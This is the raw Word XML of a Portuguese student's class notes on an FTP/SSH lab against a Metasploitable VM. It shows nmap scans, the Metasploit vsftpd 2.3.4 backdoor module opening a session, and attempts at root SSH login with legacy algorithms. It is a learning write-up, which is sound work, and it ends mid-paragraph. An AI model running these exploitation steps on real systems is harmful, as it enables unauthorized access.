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4C144" w14:textId="4BCEFE0B" w:rsidR="002B6BCA" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B6BCA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:t>Anotação da aula – FTP e SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7131B20E" w14:textId="07F38A8F" w:rsidR="002B6BCA" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="Subttulo"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:t>Leonardo Vasconcelos Correa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A88AA44" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">Comecei pela máquina Kali Linux para descobrir o endereço IP dela. Primeiro tentei usar alguns comandos que eu conhecia do Windows, mas no Kali o comando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ipconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> não funciona. Depois utilizei o comando correto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ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">, que mostrou as informações da interface de rede. O IP da minha máquina Kali era </w:t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192.168.56.102</w:t>
      </w:r>
      <w:r w:rsidRPr="00367BCD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F8AAD4" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">Depois, considerando que o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> estava no mesmo ambiente de rede virtual, utilizei o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> para verificar o IP </w:t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192.168.56.101</w:t>
      </w:r>
      <w:r w:rsidRPr="00367BCD">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BE3C5D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sudo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192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421EA236" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>O resultado mostrou que o host estava ativo e que havia várias portas abertas. Entre elas estavam a porta 21, correspondente ao FTP, e a porta 22, correspondente ao SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C41D712" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Em seguida, utilizei:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E4A521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sudo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sV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192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029FC9CB" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Esse comando serviu para descobrir as versões dos serviços encontrados. Entre os resultados apareceram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470D2C50" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>21/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tcp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ftp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  <w:r w:rsidRPr="00367BCD">
        <w:br/>
      </w:r>
      <w:proofErr w:type="gram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22/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tcp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open</w:t>
      </w:r>
      <w:proofErr w:type="gram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OpenSSH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4.7p1</w:t>
      </w:r>
      <w:r w:rsidRPr="00367BCD">
        <w:br/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80/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tcp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open http Apache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httpd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2.2.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F69E26A" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Parte do FTP – acompanhada em aula</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1FD5D2" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>A parte do FTP foi toda acompanhada durante a aula. Eu fui seguindo o que estava sendo explicado e realizando os mesmos procedimentos na minha máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5AC6E8" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Primeiro verificamos especificamente o serviço FTP com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718DA897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sudo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sV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-p 21 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6289A1DD" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">Foi confirmado que o serviço utilizado era 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  <w:r w:rsidRPr="00367BCD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5513829C" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">Depois utilizamos um script do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> para verificar se essa versão possuía uma vulnerabilidade conhecida:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68868704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sudo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--script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ftp-vsftpd-backdoor.nse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-p 21 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF69752" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">O resultado indicou que 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  <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> era vulnerável à vulnerabilidade </w:t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CVE-2011-2523</w:t>
      </w:r>
      <w:r w:rsidRPr="00367BCD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E17E9BA" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">Também utilizamos o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> para procurar informações sobre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> relacionados à versão instalada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466E3C3E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searchsploit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</w:p>
    <w:p w14:paraId="0E09EECB" w14:textId="139308F4" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">O resultado </w:t>
      </w:r>
      <w:r w:rsidR="00367BCD">
        <w:t>mostro</w:t>
      </w:r>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> relacionados ao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  <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">, incluindo o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>backdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A942D" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">Depois entramos no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> através do comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB33F30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138C0129" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">Dentro do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>, pesquisamos pela vulnerabilidade utilizando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D154ADF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search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CVE-2011-2523</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E64A11" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Foi encontrado o módulo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B44E2A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exploit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unix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ftp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/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D274884" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Então selecionamos o módulo com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6715F70D" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr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exploit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unix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ftp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/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B38B4F" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">Depois configuramos o endereço do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F42A85" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0FFB78" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>E o endereço IP da máquina Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2F0B8D" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set LHOST 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DAFBB6" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Após configurar os parâmetros, executamos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F746A4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run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="235DCD08" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> confirmou que 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vsFTPd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2.3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> parecia vulnerável e conseguiu abrir uma sessão:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608F825F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session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opened</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C8967E0" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Dentro da sessão, foi feito um teste simples para verificar a interação com o sistema remoto, utilizando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E62F5C2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mkdir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teste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757AF734" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Essa parte foi importante para entender na prática como a vulnerabilidade poderia permitir a interação com o sistema da máquina vulnerável.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096A7D08" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Parte do SSH – realizada por mim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554B4830" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">Depois da parte do FTP, comecei a trabalhar com o SSH. Diferentemente do FTP, essa parte eu fui fazendo por conta própria, utilizando o que tinha aprendido durante a </w:t>
      </w:r>
      <w:r w:rsidRPr="00367BCD">
        <w:lastRenderedPageBreak/>
        <w:t>atividade do FTP como base. Para entender os comandos e resolver alguns problemas que apareceram durante o processo, também pesquisei com ajuda da IA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0070F7AE" w14:textId="65925789" w:rsidR="00086496" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Primeiro verifiquei novamente a porta 22 e a versão do SSH com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31478551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sV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-p22 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD2450D" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>O resultado mostrou:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AFC848" w14:textId="3A350680" w:rsidR="002B6BCA" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h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22/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tcp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open</w:t>
      </w:r>
      <w:proofErr w:type="gram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OpenSSH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4.7p1 Debian 8ubuntu1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F472D46" w14:textId="1903BBAE" w:rsidR="00086496" w:rsidRPr="00367BCD" w:rsidRDefault="00086496" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F43BF81" wp14:editId="7703A8CC">
            <wp:extent cx="5400040" cy="4476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53B6" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Depois utilizei:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECF59FD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sC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sV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-p22 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC15D3" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>para obter mais informações sobre o serviço SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719E3476" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Também pesquisei quais algoritmos de criptografia eram aceitos pelo servidor utilizando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4F99E3" w14:textId="626F858E" w:rsidR="002B6BCA" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h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--script ssh2-enum-algos -p22 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6384B5" w14:textId="09BB39F5" w:rsidR="00086496" w:rsidRPr="00367BCD" w:rsidRDefault="00086496" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EAB29BE" wp14:editId="02ED2AB6">
            <wp:extent cx="5400040" cy="4476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F97" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">O resultado mostrou que o servidor utilizava alguns algoritmos antigos, como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ssh-rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">,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ssh-dss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> e </w:t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diffie-hellman-group1-sha1</w:t>
      </w:r>
      <w:r w:rsidRPr="00367BCD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205EB3CD" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Depois verifiquei os métodos de autenticação disponíveis com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C24812F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nmap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--script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ssh-auth-methods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--script-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args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ssh.user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=root -p22 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7CCD60" w14:textId="5F8C4C00" w:rsidR="002B6BCA" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>O resultado mostrou que o servidor aceitava autenticação por senha e chave pública.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244C8B93" w14:textId="6355F966" w:rsidR="00086496" w:rsidRPr="00367BCD" w:rsidRDefault="00086496" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="744DBC75" wp14:editId="3211D3A8">
            <wp:extent cx="5400040" cy="4476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CBE6" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>A partir daí tentei realizar o acesso SSH como root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019DD8E0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root@192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F95C433" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Porém, apareceu um erro relacionado aos algoritmos de chave:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F949331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Unable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negotiate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with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192.168.56.101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port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22: no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matching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host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key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found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Their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offer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</w:t>
      </w:r>
      <w:proofErr w:type="gram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rsa,ssh</w:t>
      </w:r>
      <w:proofErr w:type="gram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-dss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11DF8E1E" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">Pesquisando sobre o erro, entendi que isso acontecia porque o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>OpenSSH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> é muito antigo e utiliza algoritmos que as versões atuais do SSH no Kali não aceitam normalmente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485BBF75" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">Então tentei permitir especificamente o uso do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ssh-rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> através do comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CCCBF1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HostKeyAlgorithms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=+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ssh-rsa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root@192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B88744" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Dessa vez consegui avançar até a solicitação da senha, mas o acesso como root não funcionou. O retorno foi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1329DD5A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Permission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denied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please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try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again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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481D7F28" w14:textId="70F1AA92" w:rsidR="002B6BCA" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
